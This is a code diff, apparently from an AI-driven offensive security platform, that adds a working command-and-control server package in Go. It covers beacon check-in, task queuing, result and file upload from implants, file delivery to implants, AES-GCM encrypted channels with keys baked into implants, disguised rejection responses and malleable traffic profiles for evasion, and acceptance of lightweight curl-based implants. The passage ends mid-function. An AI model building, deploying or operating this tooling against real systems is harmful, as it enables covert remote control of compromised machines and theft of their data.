@@ -811,8 +811,8 @@ func (b *Builder) callAIForChainGeneration(ctx context.Context, prompt string) (
|
||||
"content": prompt,
|
||||
},
|
||||
},
|
||||
"temperature": 0.3,
|
||||
"max_tokens": 8000,
|
||||
"temperature": 0.3,
|
||||
"max_completion_tokens": 80000,
|
||||
}
|
||||
|
||||
var apiResponse struct {
|
||||
|
||||
@@ -0,0 +1,39 @@
|
||||
package c2
|
||||
|
||||
import (
|
||||
"strings"
|
||||
|
||||
"cyberstrike-ai/internal/database"
|
||||
|
||||
"go.uber.org/zap"
|
||||
)
|
||||
|
||||
// ResolveBeaconDialHost 决定植入端应连接的主机名(不含端口)。
|
||||
// 优先级:explicitOverride > 监听器 config_json 中的 callback_host > bind_host(0.0.0.0/::/空 时 detectExternalIP,失败则 127.0.0.1)。
|
||||
func ResolveBeaconDialHost(listener *database.C2Listener, explicitOverride string, logger *zap.Logger, listenerID string) string {
|
||||
if h := strings.TrimSpace(explicitOverride); h != "" {
|
||||
return h
|
||||
}
|
||||
cfg := &ListenerConfig{}
|
||||
if listener != nil && listener.ConfigJSON != "" {
|
||||
_ = parseJSON(listener.ConfigJSON, cfg)
|
||||
}
|
||||
if h := strings.TrimSpace(cfg.CallbackHost); h != "" {
|
||||
return h
|
||||
}
|
||||
if listener == nil {
|
||||
return "127.0.0.1"
|
||||
}
|
||||
host := strings.TrimSpace(listener.BindHost)
|
||||
if host == "0.0.0.0" || host == "" || host == "::" {
|
||||
host = detectExternalIP()
|
||||
if host == "" {
|
||||
if logger != nil {
|
||||
logger.Warn("listener binds 0.0.0.0 but no external IP detected, falling back to 127.0.0.1; set callback_host or pass explicit host",
|
||||
zap.String("listener_id", listenerID))
|
||||
}
|
||||
return "127.0.0.1"
|
||||
}
|
||||
}
|
||||
return host
|
||||
}
|
||||
@@ -0,0 +1,154 @@
|
||||
package c2
|
||||
|
||||
import (
|
||||
"crypto/aes"
|
||||
"crypto/cipher"
|
||||
"crypto/rand"
|
||||
"encoding/base64"
|
||||
"errors"
|
||||
"io"
|
||||
)
|
||||
|
||||
// AES-256-GCM 信封:每个 Listener 独立 32 字节密钥 + 每条消息独立 12 字节 nonce。
|
||||
// 协议格式(base64 文本,便于 HTTP body / SSE 直接传):
|
||||
// base64( nonce(12) || ciphertext+tag )
|
||||
// 设计要点:
|
||||
// - GCM 自带 16 字节 AEAD tag,完整性 + 机密性一次性搞定,无需额外 HMAC;
|
||||
// - nonce 由 crypto/rand 生成,96bit 在密钥不变期内重复概率极低(< 2^-32 / 4B 次);
|
||||
// - 密钥不出服务端:listener 创建时随机生成 32 字节,编译 beacon 时硬编码进去。
|
||||
|
||||
// GenerateAESKey 生成随机 32 字节 AES-256 密钥并 base64 输出
|
||||
func GenerateAESKey() (string, error) {
|
||||
key := make([]byte, 32)
|
||||
if _, err := io.ReadFull(rand.Reader, key); err != nil {
|
||||
return "", err
|
||||
}
|
||||
return base64.StdEncoding.EncodeToString(key), nil
|
||||
}
|
||||
|
||||
// GenerateImplantToken 生成 32 字节 token,base64 编码(implant 携带在 HTTP header 鉴权用)
|
||||
func GenerateImplantToken() (string, error) {
|
||||
t := make([]byte, 32)
|
||||
if _, err := io.ReadFull(rand.Reader, t); err != nil {
|
||||
return "", err
|
||||
}
|
||||
return base64.RawURLEncoding.EncodeToString(t), nil
|
||||
}
|
||||
|
||||
// EncryptAESGCM 加密任意明文,返回 base64(nonce||ct)
|
||||
func EncryptAESGCM(keyB64 string, plaintext []byte) (string, error) {
|
||||
key, err := decodeKey(keyB64)
|
||||
if err != nil {
|
||||
return "", err
|
||||
}
|
||||
block, err := aes.NewCipher(key)
|
||||
if err != nil {
|
||||
return "", err
|
||||
}
|
||||
gcm, err := cipher.NewGCM(block)
|
||||
if err != nil {
|
||||
return "", err
|
||||
}
|
||||
nonce := make([]byte, gcm.NonceSize())
|
||||
if _, err := io.ReadFull(rand.Reader, nonce); err != nil {
|
||||
return "", err
|
||||
}
|
||||
ct := gcm.Seal(nil, nonce, plaintext, nil)
|
||||
out := append(nonce, ct...)
|
||||
return base64.StdEncoding.EncodeToString(out), nil
|
||||
}
|
||||
|
||||
// DecryptAESGCM 解密 base64(nonce||ct),返回明文
|
||||
func DecryptAESGCM(keyB64, encB64 string) ([]byte, error) {
|
||||
key, err := decodeKey(keyB64)
|
||||
if err != nil {
|
||||
return nil, err
|
||||
}
|
||||
raw, err := base64.StdEncoding.DecodeString(encB64)
|
||||
if err != nil {
|
||||
return nil, errors.New("ciphertext base64 invalid")
|
||||
}
|
||||
block, err := aes.NewCipher(key)
|
||||
if err != nil {
|
||||
return nil, err
|
||||
}
|
||||
gcm, err := cipher.NewGCM(block)
|
||||
if err != nil {
|
||||
return nil, err
|
||||
}
|
||||
nonceSize := gcm.NonceSize()
|
||||
if len(raw) < nonceSize+16 { // 至少 nonce + tag
|
||||
return nil, errors.New("ciphertext too short")
|
||||
}
|
||||
nonce, ct := raw[:nonceSize], raw[nonceSize:]
|
||||
pt, err := gcm.Open(nil, nonce, ct, nil)
|
||||
if err != nil {
|
||||
return nil, errors.New("aead open failed (key mismatch or tampered)")
|
||||
}
|
||||
return pt, nil
|
||||
}
|
||||
|
||||
// EncryptAESGCMWithAAD encrypts with additional authenticated data bound to context (e.g. session_id).
|
||||
// Prevents cross-session replay: ciphertext from session A cannot be fed to session B.
|
||||
func EncryptAESGCMWithAAD(keyB64 string, plaintext []byte, aad []byte) (string, error) {
|
||||
key, err := decodeKey(keyB64)
|
||||
if err != nil {
|
||||
return "", err
|
||||
}
|
||||
block, err := aes.NewCipher(key)
|
||||
if err != nil {
|
||||
return "", err
|
||||
}
|
||||
gcm, err := cipher.NewGCM(block)
|
||||
if err != nil {
|
||||
return "", err
|
||||
}
|
||||
nonce := make([]byte, gcm.NonceSize())
|
||||
if _, err := io.ReadFull(rand.Reader, nonce); err != nil {
|
||||
return "", err
|
||||
}
|
||||
ct := gcm.Seal(nil, nonce, plaintext, aad)
|
||||
out := append(nonce, ct...)
|
||||
return base64.StdEncoding.EncodeToString(out), nil
|
||||
}
|
||||
|
||||
// DecryptAESGCMWithAAD decrypts with AAD verification.
|
||||
func DecryptAESGCMWithAAD(keyB64, encB64 string, aad []byte) ([]byte, error) {
|
||||
key, err := decodeKey(keyB64)
|
||||
if err != nil {
|
||||
return nil, err
|
||||
}
|
||||
raw, err := base64.StdEncoding.DecodeString(encB64)
|
||||
if err != nil {
|
||||
return nil, errors.New("ciphertext base64 invalid")
|
||||
}
|
||||
block, err := aes.NewCipher(key)
|
||||
if err != nil {
|
||||
return nil, err
|
||||
}
|
||||
gcm, err := cipher.NewGCM(block)
|
||||
if err != nil {
|
||||
return nil, err
|
||||
}
|
||||
nonceSize := gcm.NonceSize()
|
||||
if len(raw) < nonceSize+16 {
|
||||
return nil, errors.New("ciphertext too short")
|
||||
}
|
||||
nonce, ct := raw[:nonceSize], raw[nonceSize:]
|
||||
pt, err := gcm.Open(nil, nonce, ct, aad)
|
||||
if err != nil {
|
||||
return nil, errors.New("aead open failed (key mismatch, tampered, or AAD mismatch)")
|
||||
}
|
||||
return pt, nil
|
||||
}
|
||||
|
||||
func decodeKey(keyB64 string) ([]byte, error) {
|
||||
key, err := base64.StdEncoding.DecodeString(keyB64)
|
||||
if err != nil {
|
||||
return nil, errors.New("key base64 invalid")
|
||||
}
|
||||
if len(key) != 32 {
|
||||
return nil, errors.New("key must be 32 bytes (AES-256)")
|
||||
}
|
||||
return key, nil
|
||||
}
|
||||
@@ -0,0 +1,144 @@
|
||||
package c2
|
||||
|
||||
import (
|
||||
"sync"
|
||||
"sync/atomic"
|
||||
"time"
|
||||
)
|
||||
|
||||
// Event 是 EventBus 内部传输的事件单元,是 database.C2Event 的"实时投影"。
|
||||
// 区别在于:
|
||||
// - 数据库表保存全部历史,用于审计与列表分页;
|
||||
// - EventBus 只缓存最近 N 条,用于 SSE/WS 实时推送给在线订阅者。
|
||||
type Event struct {
|
||||
ID string `json:"id"`
|
||||
Level string `json:"level"`
|
||||
Category string `json:"category"`
|
||||
SessionID string `json:"sessionId,omitempty"`
|
||||
TaskID string `json:"taskId,omitempty"`
|
||||
Message string `json:"message"`
|
||||
Data map[string]interface{} `json:"data,omitempty"`
|
||||
CreatedAt time.Time `json:"createdAt"`
|
||||
}
|
||||
|
||||
// EventBus 简单的内存广播总线。
|
||||
// 设计要点:
|
||||
// - 多订阅者:每个订阅者有独立 buffered channel,慢消费者不会阻塞 publisher;
|
||||
// - 容量满即丢弃:发布端绝不阻塞,避免 listener accept loop / beacon handler 卡住;
|
||||
// - 全局过滤:订阅时可限定 SessionID/Category,前端按需订阅,省 CPU;
|
||||
// - 关闭安全:Close() 后所有订阅者 chan 关闭,防止 goroutine 泄漏。
|
||||
type EventBus struct {
|
||||
mu sync.RWMutex
|
||||
subscribers map[string]*Subscription
|
||||
closed bool
|
||||
}
|
||||
|
||||
// Subscription 订阅句柄
|
||||
type Subscription struct {
|
||||
ID string
|
||||
Ch chan *Event
|
||||
SessionID string // 空表示不限制
|
||||
Category string // 空表示不限制
|
||||
Levels map[string]struct{}
|
||||
dropCount atomic.Int64
|
||||
}
|
||||
|
||||
// NewEventBus 创建总线
|
||||
func NewEventBus() *EventBus {
|
||||
return &EventBus{subscribers: make(map[string]*Subscription)}
|
||||
}
|
||||
|
||||
// Subscribe 注册订阅者;返回 Subscription,调用方负责后续 Unsubscribe。
|
||||
// - bufferSize:单订阅者 channel 容量,建议 64~256;
|
||||
// - sessionFilter / categoryFilter:空字符串=不限;
|
||||
// - levelFilter:[]string{"warn","critical"} 这类,nil/空表示全收。
|
||||
func (b *EventBus) Subscribe(id string, bufferSize int, sessionFilter, categoryFilter string, levelFilter []string) *Subscription {
|
||||
if bufferSize <= 0 {
|
||||
bufferSize = 128
|
||||
}
|
||||
sub := &Subscription{
|
||||
ID: id,
|
||||
Ch: make(chan *Event, bufferSize),
|
||||
SessionID: sessionFilter,
|
||||
Category: categoryFilter,
|
||||
}
|
||||
if len(levelFilter) > 0 {
|
||||
sub.Levels = make(map[string]struct{}, len(levelFilter))
|
||||
for _, l := range levelFilter {
|
||||
sub.Levels[l] = struct{}{}
|
||||
}
|
||||
}
|
||||
b.mu.Lock()
|
||||
defer b.mu.Unlock()
|
||||
if b.closed {
|
||||
close(sub.Ch)
|
||||
return sub
|
||||
}
|
||||
b.subscribers[id] = sub
|
||||
return sub
|
||||
}
|
||||
|
||||
// Unsubscribe 注销订阅者并关闭 channel
|
||||
func (b *EventBus) Unsubscribe(id string) {
|
||||
b.mu.Lock()
|
||||
defer b.mu.Unlock()
|
||||
if sub, ok := b.subscribers[id]; ok {
|
||||
delete(b.subscribers, id)
|
||||
close(sub.Ch)
|
||||
}
|
||||
}
|
||||
|
||||
// Publish 广播事件给所有订阅者;非阻塞,channel 满时静默丢弃
|
||||
func (b *EventBus) Publish(e *Event) {
|
||||
if e == nil {
|
||||
return
|
||||
}
|
||||
b.mu.RLock()
|
||||
subs := make([]*Subscription, 0, len(b.subscribers))
|
||||
for _, s := range b.subscribers {
|
||||
if s.matches(e) {
|
||||
subs = append(subs, s)
|
||||
}
|
||||
}
|
||||
closed := b.closed
|
||||
b.mu.RUnlock()
|
||||
if closed {
|
||||
return
|
||||
}
|
||||
for _, s := range subs {
|
||||
select {
|
||||
case s.Ch <- e:
|
||||
default:
|
||||
s.dropCount.Add(1)
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
// Close 关闭总线,停止所有订阅
|
||||
func (b *EventBus) Close() {
|
||||
b.mu.Lock()
|
||||
defer b.mu.Unlock()
|
||||
if b.closed {
|
||||
return
|
||||
}
|
||||
b.closed = true
|
||||
for id, s := range b.subscribers {
|
||||
close(s.Ch)
|
||||
delete(b.subscribers, id)
|
||||
}
|
||||
}
|
||||
|
||||
func (s *Subscription) matches(e *Event) bool {
|
||||
if s.SessionID != "" && e.SessionID != s.SessionID {
|
||||
return false
|
||||
}
|
||||
if s.Category != "" && e.Category != s.Category {
|
||||
return false
|
||||
}
|
||||
if len(s.Levels) > 0 {
|
||||
if _, ok := s.Levels[e.Level]; !ok {
|
||||
return false
|
||||
}
|
||||
}
|
||||
return true
|
||||
}
|
||||
@@ -0,0 +1,29 @@
|
||||
package c2
|
||||
|
||||
import "context"
|
||||
|
||||
type hitlRunCtxKey struct{}
|
||||
|
||||
// WithHITLRunContext 将 runCtx(通常为整条 Agent / SSE 请求生命周期)挂到传入的 ctx 上。
|
||||
// MCP 工具 handler 收到的 ctx 可能是带单次工具超时的子 context,在工具 return 时会被 cancel;
|
||||
// 危险任务 HITL 应通过 HITLUserContext 使用 runCtx 等待人工审批。
|
||||
func WithHITLRunContext(ctx, runCtx context.Context) context.Context {
|
||||
if ctx == nil || runCtx == nil {
|
||||
return ctx
|
||||
}
|
||||
return context.WithValue(ctx, hitlRunCtxKey{}, runCtx)
|
||||
}
|
||||
|
||||
// HITLUserContext 返回用于 C2 危险任务 HITL 等待的 context:
|
||||
// 若曾用 WithHITLRunContext 注入更长寿命的 runCtx 则返回之,否则返回 ctx。
|
||||
func HITLUserContext(ctx context.Context) context.Context {
|
||||
if ctx == nil {
|
||||
return context.Background()
|
||||
}
|
||||
if v := ctx.Value(hitlRunCtxKey{}); v != nil {
|
||||
if run, ok := v.(context.Context); ok && run != nil {
|
||||
return run
|
||||
}
|
||||
}
|
||||
return ctx
|
||||
}
|
||||
@@ -0,0 +1,22 @@
|
||||
package c2
|
||||
|
||||
import (
|
||||
"encoding/base64"
|
||||
"os"
|
||||
)
|
||||
|
||||
// 这些薄封装存在的目的:
|
||||
// - 让 manager.go / handler 中的逻辑更直观,避免反复 import os;
|
||||
// - 便于将来用接口抽象(譬如改成 internal/storage 的实现)做单元测试。
|
||||
|
||||
func osMkdirAll(path string, perm os.FileMode) error {
|
||||
return os.MkdirAll(path, perm)
|
||||
}
|
||||
|
||||
func osWriteFile(path string, data []byte, perm os.FileMode) error {
|
||||
return os.WriteFile(path, data, perm)
|
||||
}
|
||||
|
||||
func base64Decode(s string) ([]byte, error) {
|
||||
return base64.StdEncoding.DecodeString(s)
|
||||
}
|
||||
@@ -0,0 +1,69 @@
|
||||
package c2
|
||||
|
||||
import (
|
||||
"strings"
|
||||
"sync"
|
||||
|
||||
"cyberstrike-ai/internal/database"
|
||||
|
||||
"go.uber.org/zap"
|
||||
)
|
||||
|
||||
// Listener 监听器抽象:每种传输方式(TCP/HTTP/HTTPS/WS/DNS)都实现此接口;
|
||||
// Manager 不感知具体实现细节,通过 ListenerRegistry 工厂创建。
|
||||
type Listener interface {
|
||||
// Type 返回当前 listener 的类型字符串(如 "tcp_reverse")
|
||||
Type() string
|
||||
// Start 启动监听;如果端口被占用应返回 ErrPortInUse
|
||||
Start() error
|
||||
// Stop 停止监听并释放所有相关 goroutine(不应抛 panic)
|
||||
Stop() error
|
||||
}
|
||||
|
||||
// ListenerCreationCtx 工厂初始化 listener 时收到的上下文
|
||||
type ListenerCreationCtx struct {
|
||||
Listener *database.C2Listener
|
||||
Config *ListenerConfig
|
||||
Manager *Manager
|
||||
Logger *zap.Logger
|
||||
}
|
||||
|
||||
// ListenerFactory 创建 listener 实例的工厂;返回的实例尚未 Start
|
||||
type ListenerFactory func(ctx ListenerCreationCtx) (Listener, error)
|
||||
|
||||
// ListenerRegistry 类型 → 工厂 的注册表,由 internal/app 启动时注册具体实现,
|
||||
// 测试中也可注入 mock 工厂来覆盖。
|
||||
type ListenerRegistry struct {
|
||||
mu sync.RWMutex
|
||||
factories map[string]ListenerFactory
|
||||
}
|
||||
|
||||
// NewListenerRegistry 创建空注册表
|
||||
func NewListenerRegistry() *ListenerRegistry {
|
||||
return &ListenerRegistry{factories: make(map[string]ListenerFactory)}
|
||||
}
|
||||
|
||||
// Register 注册一种 listener 工厂
|
||||
func (r *ListenerRegistry) Register(typeName string, f ListenerFactory) {
|
||||
r.mu.Lock()
|
||||
defer r.mu.Unlock()
|
||||
r.factories[strings.ToLower(strings.TrimSpace(typeName))] = f
|
||||
}
|
||||
|
||||
// Get 取工厂;nil 表示未注册
|
||||
func (r *ListenerRegistry) Get(typeName string) ListenerFactory {
|
||||
r.mu.RLock()
|
||||
defer r.mu.RUnlock()
|
||||
return r.factories[strings.ToLower(strings.TrimSpace(typeName))]
|
||||
}
|
||||
|
||||
// RegisteredTypes 列出已注册的类型,给前端枚举用
|
||||
func (r *ListenerRegistry) RegisteredTypes() []string {
|
||||
r.mu.RLock()
|
||||
defer r.mu.RUnlock()
|
||||
out := make([]string, 0, len(r.factories))
|
||||
for k := range r.factories {
|
||||
out = append(out, k)
|
||||
}
|
||||
return out
|
||||
}
|
||||
@@ -0,0 +1,549 @@
|
||||
package c2
|
||||
|
||||
import (
|
||||
"crypto/ecdsa"
|
||||
"crypto/elliptic"
|
||||
"crypto/rand"
|
||||
"crypto/sha256"
|
||||
"crypto/subtle"
|
||||
"crypto/tls"
|
||||
"crypto/x509"
|
||||
"crypto/x509/pkix"
|
||||
"encoding/base64"
|
||||
"encoding/hex"
|
||||
"encoding/json"
|
||||
"encoding/pem"
|
||||
"errors"
|
||||
"fmt"
|
||||
"io"
|
||||
"math/big"
|
||||
mrand "math/rand"
|
||||
"net"
|
||||
"net/http"
|
||||
"os"
|
||||
"path/filepath"
|
||||
"strings"
|
||||
"sync"
|
||||
"time"
|
||||
|
||||
"cyberstrike-ai/internal/database"
|
||||
|
||||
"go.uber.org/zap"
|
||||
)
|
||||
|
||||
// HTTPBeaconListener 实现 HTTP/HTTPS Beacon:
|
||||
// - beacon 端定期 POST {checkin_path}(携带 implant_token + AES 加密 body);
|
||||
// - 服务端解密、登记会话、回执 sleep + 是否有任务;
|
||||
// - beacon 收到 has_tasks=true 时 GET {tasks_path} 拉取加密任务列表;
|
||||
// - 任务完成后 POST {result_path} 回传结果。
|
||||
//
|
||||
// 优势:所有任务异步、可批量、支持文件上传/截图/任意大 blob,是 C2 的"主战场"。
|
||||
type HTTPBeaconListener struct {
|
||||
rec *database.C2Listener
|
||||
cfg *ListenerConfig
|
||||
manager *Manager
|
||||
logger *zap.Logger
|
||||
useTLS bool
|
||||
profile *database.C2Profile
|
||||
|
||||
srv *http.Server
|
||||
mu sync.Mutex
|
||||
stopCh chan struct{}
|
||||
stopped bool
|
||||
}
|
||||
|
||||
// NewHTTPBeaconListener 工厂(注册到 ListenerRegistry["http_beacon"])
|
||||
func NewHTTPBeaconListener(ctx ListenerCreationCtx) (Listener, error) {
|
||||
return &HTTPBeaconListener{
|
||||
rec: ctx.Listener,
|
||||
cfg: ctx.Config,
|
||||
manager: ctx.Manager,
|
||||
logger: ctx.Logger,
|
||||
useTLS: false,
|
||||
stopCh: make(chan struct{}),
|
||||
}, nil
|
||||
}
|
||||
|
||||
// NewHTTPSBeaconListener 工厂(注册到 ListenerRegistry["https_beacon"])
|
||||
func NewHTTPSBeaconListener(ctx ListenerCreationCtx) (Listener, error) {
|
||||
return &HTTPBeaconListener{
|
||||
rec: ctx.Listener,
|
||||
cfg: ctx.Config,
|
||||
manager: ctx.Manager,
|
||||
logger: ctx.Logger,
|
||||
useTLS: true,
|
||||
stopCh: make(chan struct{}),
|
||||
}, nil
|
||||
}
|
||||
|
||||
// Type 类型字符串
|
||||
func (l *HTTPBeaconListener) Type() string {
|
||||
if l.useTLS {
|
||||
return string(ListenerTypeHTTPSBeacon)
|
||||
}
|
||||
return string(ListenerTypeHTTPBeacon)
|
||||
}
|
||||
|
||||
// Start 起 HTTP server
|
||||
func (l *HTTPBeaconListener) Start() error {
|
||||
// Load Malleable Profile if configured
|
||||
l.loadProfile()
|
||||
|
||||
mux := http.NewServeMux()
|
||||
mux.HandleFunc(l.cfg.BeaconCheckInPath, l.withProfileHeaders(l.handleCheckIn))
|
||||
mux.HandleFunc(l.cfg.BeaconTasksPath, l.withProfileHeaders(l.handleTasks))
|
||||
mux.HandleFunc(l.cfg.BeaconResultPath, l.withProfileHeaders(l.handleResult))
|
||||
mux.HandleFunc(l.cfg.BeaconUploadPath, l.withProfileHeaders(l.handleUpload))
|
||||
mux.HandleFunc(l.cfg.BeaconFilePath, l.withProfileHeaders(l.handleFileServe))
|
||||
|
||||
addr := fmt.Sprintf("%s:%d", l.rec.BindHost, l.rec.BindPort)
|
||||
l.srv = &http.Server{
|
||||
Addr: addr,
|
||||
Handler: mux,
|
||||
ReadHeaderTimeout: 15 * time.Second,
|
||||
ReadTimeout: 60 * time.Second,
|
||||
WriteTimeout: 120 * time.Second,
|
||||
IdleTimeout: 300 * time.Second,
|
||||
}
|
||||
|
||||
ln, err := net.Listen("tcp", addr)
|
||||
if err != nil {
|
||||
if isAddrInUse(err) {
|
||||
return ErrPortInUse
|
||||
}
|
||||
return err
|
||||
}
|
||||
|
||||
if l.useTLS {
|
||||
tlsConfig, err := l.buildTLSConfig()
|
||||
if err != nil {
|
||||
_ = ln.Close()
|
||||
return fmt.Errorf("build TLS config: %w", err)
|
||||
}
|
||||
l.srv.TLSConfig = tlsConfig
|
||||
go func() {
|
||||
if err := l.srv.ServeTLS(ln, "", ""); err != nil && !errors.Is(err, http.ErrServerClosed) {
|
||||
l.logger.Warn("https_beacon ServeTLS exited", zap.Error(err))
|
||||
}
|
||||
}()
|
||||
} else {
|
||||
go func() {
|
||||
if err := l.srv.Serve(ln); err != nil && !errors.Is(err, http.ErrServerClosed) {
|
||||
l.logger.Warn("http_beacon Serve exited", zap.Error(err))
|
||||
}
|
||||
}()
|
||||
}
|
||||
return nil
|
||||
}
|
||||
|
||||
// Stop 关闭
|
||||
func (l *HTTPBeaconListener) Stop() error {
|
||||
l.mu.Lock()
|
||||
if l.stopped {
|
||||
l.mu.Unlock()
|
||||
return nil
|
||||
}
|
||||
l.stopped = true
|
||||
close(l.stopCh)
|
||||
l.mu.Unlock()
|
||||
if l.srv != nil {
|
||||
ctx, cancel := contextWithTimeout(5 * time.Second)
|
||||
defer cancel()
|
||||
_ = l.srv.Shutdown(ctx)
|
||||
}
|
||||
return nil
|
||||
}
|
||||
|
||||
// ----------------------------------------------------------------------------
|
||||
// HTTP handlers
|
||||
// ----------------------------------------------------------------------------
|
||||
|
||||
func (l *HTTPBeaconListener) handleCheckIn(w http.ResponseWriter, r *http.Request) {
|
||||
if r.Method != http.MethodPost {
|
||||
http.Error(w, "method not allowed", http.StatusMethodNotAllowed)
|
||||
return
|
||||
}
|
||||
if !l.checkImplantToken(r) {
|
||||
l.disguisedReject(w)
|
||||
return
|
||||
}
|
||||
body, err := io.ReadAll(http.MaxBytesReader(w, r.Body, 1<<20))
|
||||
if err != nil {
|
||||
http.Error(w, "read failed", http.StatusBadRequest)
|
||||
return
|
||||
}
|
||||
|
||||
// 尝试 AES-GCM 解密(完整 beacon 二进制走加密通道)
|
||||
var req ImplantCheckInRequest
|
||||
plaintext, decErr := DecryptAESGCM(l.rec.EncryptionKey, string(body))
|
||||
if decErr == nil {
|
||||
if err := json.Unmarshal(plaintext, &req); err != nil {
|
||||
l.disguisedReject(w)
|
||||
return
|
||||
}
|
||||
} else {
|
||||
// 解密失败:尝试当作明文 JSON(兼容 curl oneliner 等轻量级客户端)
|
||||
if err := json.Unmarshal(body, &req); err != nil {
|
||||
l.disguisedReject(w)
|
||||
return
|
||||
}
|
||||
}
|
||||
isPlaintext := decErr != nil
|
||||
|
||||
if req.UserAgent == "" {
|
||||
req.UserAgent = r.UserAgent()
|
||||
}
|
||||
if req.SleepSeconds <= 0 {
|
||||
req.SleepSeconds = l.cfg.DefaultSleep
|
||||
}
|
||||
// curl oneliner 可能不携带完整字段,用 remote IP + listener ID 生成稳定标识
|
||||
host, _, _ := net.SplitHostPort(r.RemoteAddr)
|
||||
if strings.TrimSpace(req.ImplantUUID) == "" {
|
||||
// 基于 IP + listener ID 生成稳定 UUID,同一 IP 多次 check_in 复用同一会话
|
||||
req.ImplantUUID = fmt.Sprintf("curl_%s_%s", host, shortHash(host+l.rec.ID))
|
||||
}
|
||||
if strings.TrimSpace(req.Hostname) == "" {
|
||||
req.Hostname = "curl_" + host
|
||||
}
|
||||
if strings.TrimSpace(req.InternalIP) == "" {
|
||||
req.InternalIP = host
|
||||
}
|
||||
if strings.TrimSpace(req.OS) == "" {
|
||||
req.OS = "unknown"
|
||||
}
|
||||
if strings.TrimSpace(req.Arch) == "" {
|
||||
req.Arch = "unknown"
|
||||
}
|
||||
session, err := l.manager.IngestCheckIn(l.rec.ID, req)
|
||||
if err != nil {
|
||||
http.Error(w, "ingest failed", http.StatusInternalServerError)
|
||||
return
|
||||
}
|
||||
queued, _ := l.manager.DB().ListC2Tasks(database.ListC2TasksFilter{
|
||||
SessionID: session.ID,
|
||||
Status: string(TaskQueued),
|
||||
Limit: 1,
|
||||
})
|
||||
resp := ImplantCheckInResponse{
|
||||
SessionID: session.ID,
|
||||
NextSleep: session.SleepSeconds,
|
||||
NextJitter: session.JitterPercent,
|
||||
HasTasks: len(queued) > 0,
|
||||
ServerTime: time.Now().UnixMilli(),
|
||||
}
|
||||
if isPlaintext {
|
||||
w.Header().Set("Content-Type", "application/json")
|
||||
json.NewEncoder(w).Encode(resp)
|
||||
} else {
|
||||
l.writeEncrypted(w, resp)
|
||||
}
|
||||
}
|
||||
|
||||
func (l *HTTPBeaconListener) handleTasks(w http.ResponseWriter, r *http.Request) {
|
||||
if r.Method != http.MethodGet {
|
||||
http.Error(w, "method not allowed", http.StatusMethodNotAllowed)
|
||||
return
|
||||
}
|
||||
if !l.checkImplantToken(r) {
|
||||
l.disguisedReject(w)
|
||||
return
|
||||
}
|
||||
sessionID := r.URL.Query().Get("session_id")
|
||||
if sessionID == "" {
|
||||
l.disguisedReject(w)
|
||||
return
|
||||
}
|
||||
session, err := l.manager.DB().GetC2Session(sessionID)
|
||||
if err != nil || session == nil {
|
||||
l.disguisedReject(w)
|
||||
return
|
||||
}
|
||||
envelopes, err := l.manager.PopTasksForBeacon(sessionID, 50)
|
||||
if err != nil {
|
||||
http.Error(w, "pop tasks failed", http.StatusInternalServerError)
|
||||
return
|
||||
}
|
||||
if envelopes == nil {
|
||||
envelopes = []TaskEnvelope{}
|
||||
}
|
||||
resp := map[string]interface{}{"tasks": envelopes}
|
||||
if l.isPlaintextClient(r) {
|
||||
w.Header().Set("Content-Type", "application/json")
|
||||
json.NewEncoder(w).Encode(resp)
|
||||
} else {
|
||||
l.writeEncrypted(w, resp)
|
||||
}
|
||||
}
|
||||
|
||||
func (l *HTTPBeaconListener) handleResult(w http.ResponseWriter, r *http.Request) {
|
||||
if r.Method != http.MethodPost {
|
||||
http.Error(w, "method not allowed", http.StatusMethodNotAllowed)
|
||||
return
|
||||
}
|
||||
if !l.checkImplantToken(r) {
|
||||
l.disguisedReject(w)
|
||||
return
|
||||
}
|
||||
body, err := io.ReadAll(http.MaxBytesReader(w, r.Body, 64<<20))
|
||||
if err != nil {
|
||||
http.Error(w, "read failed", http.StatusBadRequest)
|
||||
return
|
||||
}
|
||||
var report TaskResultReport
|
||||
plaintext, decErr := DecryptAESGCM(l.rec.EncryptionKey, string(body))
|
||||
if decErr == nil {
|
||||
if err := json.Unmarshal(plaintext, &report); err != nil {
|
||||
l.disguisedReject(w)
|
||||
return
|
||||
}
|
||||
} else {
|
||||
if err := json.Unmarshal(body, &report); err != nil {
|
||||
l.disguisedReject(w)
|
||||
return
|
||||
}
|
||||
}
|
||||
if err := l.manager.IngestTaskResult(report); err != nil {
|
||||
http.Error(w, "ingest result failed", http.StatusInternalServerError)
|
||||
return
|
||||
}
|
||||
resp := map[string]string{"ok": "1"}
|
||||
if l.isPlaintextClient(r) {
|
||||
w.Header().Set("Content-Type", "application/json")
|
||||
json.NewEncoder(w).Encode(resp)
|
||||
} else {
|
||||
l.writeEncrypted(w, resp)
|
||||
}
|
||||
}
|
||||
|
||||
// handleUpload 实现 implant 主动上传文件给服务端(如 download 任务的二进制结果)。
|
||||
// Body 为 AES-GCM 加密后的 base64,与 check-in/result 保持一致的安全策略。
|
||||
func (l *HTTPBeaconListener) handleUpload(w http.ResponseWriter, r *http.Request) {
|
||||
if r.Method != http.MethodPost {
|
||||
http.Error(w, "method not allowed", http.StatusMethodNotAllowed)
|
||||
return
|
||||
}
|
||||
if !l.checkImplantToken(r) {
|
||||
l.disguisedReject(w)
|
||||
return
|
||||
}
|
||||
taskID := r.URL.Query().Get("task_id")
|
||||
if taskID == "" {
|
||||
l.disguisedReject(w)
|
||||
return
|
||||
}
|
||||
body, err := io.ReadAll(http.MaxBytesReader(w, r.Body, 256<<20))
|
||||
if err != nil {
|
||||
http.Error(w, "read failed", http.StatusBadRequest)
|
||||
return
|
||||
}
|
||||
plaintext, err := DecryptAESGCM(l.rec.EncryptionKey, string(body))
|
||||
if err != nil {
|
||||
l.disguisedReject(w)
|
||||
return
|
||||
}
|
||||
dir := filepath.Join(l.manager.StorageDir(), "uploads")
|
||||
if err := os.MkdirAll(dir, 0o755); err != nil {
|
||||
http.Error(w, "mkdir failed", http.StatusInternalServerError)
|
||||
return
|
||||
}
|
||||
dst := filepath.Join(dir, taskID+".bin")
|
||||
if err := os.WriteFile(dst, plaintext, 0o644); err != nil {
|
||||
http.Error(w, "save failed", http.StatusInternalServerError)
|
||||
return
|
||||
}
|
||||
l.writeEncrypted(w, map[string]interface{}{"ok": 1, "size": len(plaintext)})
|
||||
}
|
||||
|
||||
// handleFileServe 实现服务端 → implant 的文件下发(upload 任务用)。
|
||||
// 路径形如 /file/<task_id>,文件内容经 AES-GCM 加密后返回。
|
||||
func (l *HTTPBeaconListener) handleFileServe(w http.ResponseWriter, r *http.Request) {
|
||||
if r.Method != http.MethodGet {
|
||||
http.Error(w, "method not allowed", http.StatusMethodNotAllowed)
|
||||
return
|
||||
}
|
||||
